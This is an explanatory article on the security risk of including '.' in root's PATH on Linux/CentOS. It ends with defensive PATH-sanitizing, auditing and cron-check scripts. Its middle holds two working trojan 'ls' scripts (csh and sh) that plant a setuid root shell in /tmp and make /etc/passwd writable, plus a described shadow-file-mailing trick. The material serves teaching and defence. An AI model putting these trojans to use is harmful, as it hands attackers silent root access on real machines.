How does the PATH environment variable on CentOS create security issues?


`.` represents the current directory. If it is added to root's PATH, then running a script only requires typing the script's name: the system finds the script in the current directory and executes it.

For example, when a USB flash drive is plugged into the computer and you type a file name, the system executes the file on the drive. If that file is a Trojan horse, it is executed too; if the script contains `rm -rf /*`, your system is deleted.

Imagine someone writing an executable program called `ls` in a directory he can write to. The program mails the /etc/shadow file to a mailbox, and root happens to be in that directory. Imagine what happens when root types `ls`.

Therefore, many Unix systems with high security requirements even require commands to be invoked by absolute path.

This article mainly describes the problems caused by `.` in the PATH environment variable on Linux, and several ways to solve them.

As many people know, the $PATH environment variable holds a list of directories. When a user runs a program, the system searches those directories in order to locate it. $PATH only comes into play when the program name contains no slash; a name given as `./foo` or `/bin/foo` is run from that path directly.
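To make the lookup order concrete, the following added example (not code from the original article) re-implements the shell's PATH scan in POSIX sh and runs it against two constructed directories: `sys` stands in for /bin and `cwd` for a directory another user can write to. The function names and the `foo` program are assumptions for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original article): resolve a command name the
# way the shell does, scanning the PATH list from left to right and taking
# the first executable match. An empty entry ("::", or a leading/trailing ":")
# is treated as the current directory, exactly like an explicit ".".
lookup_in_path() {
    cmd=$1
    rest="$2:"                  # trailing ':' so the last entry is visited
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        rest=${rest#*:}
        if [ -z "$dir" ]; then  # empty entry means the current directory
            dir=.
        fi
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            printf '%s\n' "$dir/$cmd"
            return 0
        fi
    done
    return 1                    # not found anywhere on the list
}

# Demonstration with constructed directories: "sys" stands in for /bin and
# "cwd" for a directory somebody else can write to.
demo_lookup() {
    work=$(mktemp -d)
    mkdir "$work/sys" "$work/cwd"
    printf '#!/bin/sh\necho real\n' > "$work/sys/foo"
    printf '#!/bin/sh\necho planted\n' > "$work/cwd/foo"
    chmod 755 "$work/sys/foo" "$work/cwd/foo"
    (
        cd "$work/cwd" || exit 1
        for list in "$work/sys" ".:$work/sys" ":$work/sys" "$work/sys:."; do
            printf 'PATH=%s -> %s\n' "$list" "$(lookup_in_path foo "$list")"
        done
    )
    rm -rf "$work"
}

demo_lookup
```

Only the first line of the demonstration resolves `foo` to the system copy; both `.:` and a bare leading `:` make the copy in the current directory win, and a trailing `.` only matters when the name is not found earlier on the list.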

By default, `.` (the entry that denotes the user's current directory) is not included in $PATH for either regular users or root. This is inconvenient for programmers who develop scripts locally, and those who want to save a few keystrokes add `.` to the search path, which amounts to planting a danger in your system.

For example, root adds a dot to the end of his PATH for convenience (the dot entry means the current directory).

The commands are:

```
# PATH=$PATH:.
# echo $PATH
```


It is convenient to type the script name directly to run it. Under normal circumstances there is no problem at all, and it saves the trouble of typing `./foo.sh` (foo.sh being my hypothetical script name). Some roots add the command `PATH=$PATH:.` to the profile so that all users share the "gospel" they bring. The more "thorough" root uses `PATH=.:$PATH`, putting the dot first (a leading or doubled `:` in PATH is another spelling of the same thing). Everything was fine until one day Zhang San put a script named `lls` in his home directory and told root that his system had a problem and asked root to help solve it (it was actually a trap). Root switched to administrator privileges and went to list that directory; perhaps the administrator mistyped `lls`, and the result was... haha.

Here is a simple example in C shell:

```csh
# only act when run by the owner of /bin/su, i.e. root
if ( ! -o /bin/su ) goto finish
cp /bin/sh /tmp/.sh
chmod 7777 /tmp/.sh
finish:
exec /bin/ls $argv | grep -v ls
```

Here is a Bourne shell version with a slight twist:

```sh
# the chmod only succeeds for root, so it doubles as the privilege check
if chmod 666 /etc/passwd > /dev/null 2>&1 ; then
    cp /bin/sh /tmp/.sh
    chmod 4755 /tmp/.sh
fi
exec ls "$@"
```

If root includes `.` in $PATH, and it comes before the system directory where `ls` lives, then when root runs `ls` in /tmp the script above is executed instead of the real `ls`; because the real `ls` is executed at the end, root sees nothing unusual. When root runs the script, it makes the password file writable, copies the shell to /tmp as `.sh`, and sets its setuid bit, all of it very quietly.

With the two programs above, an ill-intentioned person can write any program that would make root want to jump off a building, a trap laid by a subordinate that root may not even notice walking into. Perhaps there is a script named `ps` in Zhang San's home directory containing dangerous commands; root might type `ps` there, the system searches the current directory first, and /sbin/ps is not what runs. There are many tricks like this.

Administrator comrades, don't be too nervous; let me talk about the solutions.

First, develop the habit of typing absolute paths on the command line, so that "bad elements" have no gap to slip through. For example, to list a directory it is better to use `/bin/ls` than to casually type `ls`.

Second, root should not include `.` in the list of search directories at all, and ordinary users who do include `.` should put it at the end of the list. That way ordinary users will not be harmed in the way described above.
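An administrator will want a quick way to check a PATH for the entries discussed here. The following added example (not code from the original article) walks the list and reports every entry that lets someone else decide which program runs when a bare command name is typed: `.`, empty entries, relative entries, and absolute directories that are world-writable. The function name and output format are assumptions for the demonstration; the world-writable test reads the "other" write bit from `ls -ld`, so a sticky-bit directory such as /tmp is still reported, since anyone can create new files there.

```shell
#!/bin/sh
# Added example (not from the original article): report PATH entries that let
# someone else decide which program runs when a bare command name is typed.
# One line per finding, "kind:entry"; nothing printed means no finding.
path_risky_entries() {
    rest="$1:"                  # trailing ':' so the last entry is visited
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        rest=${rest#*:}
        case $dir in
            "")  echo "empty-entry:" ;;            # "::" or leading/trailing ':' = current directory
            .)   echo "dot-entry:." ;;
            /*)  # absolute path: dangerous only if others can create files in it
                 if [ -d "$dir" ] && [ "$(ls -ld "$dir" | cut -c9)" = w ]; then
                     echo "world-writable:$dir"
                 fi ;;
            *)   echo "relative-entry:$dir" ;;     # resolved against the current directory too
        esac
    done
    return 0
}

# Usage: audit the live environment of whoever runs the script.
path_risky_entries "$PATH"
```

Run it from root's login shell and from each user's profile; an empty report is the goal for root, and for ordinary users anything other than a single trailing `dot-entry` line deserves a look. Note that even a trailing `.` still resolves mistyped names such as `lls` from the current directory, so the audit treats it as a finding rather than silently accepting it.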

Finally, you can add the following line at the end of /etc/profile and of the users' .bashrc or .profile files, which are read at login:

```sh
PATH=`echo $PATH | sed -e 's/::/:/g; s/:\.:/:/g; s/:\.$//; s/^\.://; s/^://; s/:$//'`
```

This simple sed command deletes every `.` entry in PATH, whether it appears at the start, in the middle or at the end, including its other spelling, an empty entry (a leading, trailing or doubled `:`).
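As an added example (not code from the original article), the same cleanup can be done by walking the list entry by entry instead of with regular expressions, which also handles adjacent entries such as `:.:.:` that a single global substitution misses, and removes duplicate directories as a bonus. The function name is an assumption; it drops only `.` and empty entries, leaving any other relative entry for the administrator to judge.

```shell
#!/bin/sh
# Added example (not from the original article): rebuild PATH without any
# current-directory entry, walking the list entry by entry. It drops "." and
# empty entries wherever they appear, including the leading ".:" and the
# adjacent ":.:.:" cases, and keeps only the first occurrence of a directory.
sanitize_path() {
    rest="$1:"                  # trailing ':' so the last entry is visited
    clean=""
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        rest=${rest#*:}
        case $dir in
            ""|.) continue ;;               # current directory in either spelling
        esac
        case ":$clean:" in
            *":$dir:"*) continue ;;         # already present, keep the first occurrence
        esac
        clean="${clean:+$clean:}$dir"
    done
    printf '%s\n' "$clean"
}

# Usage from /etc/profile or ~/.profile:
PATH=$(sanitize_path "$PATH")
export PATH
```

Because the function rewrites the variable rather than filtering a stream, it can be called again after any later profile fragment has appended to PATH, so a `.` added by a user's own dotfile is removed as well.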

The following can also be run periodically from crontab:

```sh
# find / ! -fstype proc '(' -name '.??*' -o -name '.[^.]' ')' > point.txt ; mail -s 'this is a pointlist' root < point.txt
```

It finds every file whose name starts with a dot, mails the list to root's mailbox, and the lists can then be compared from one run to the next.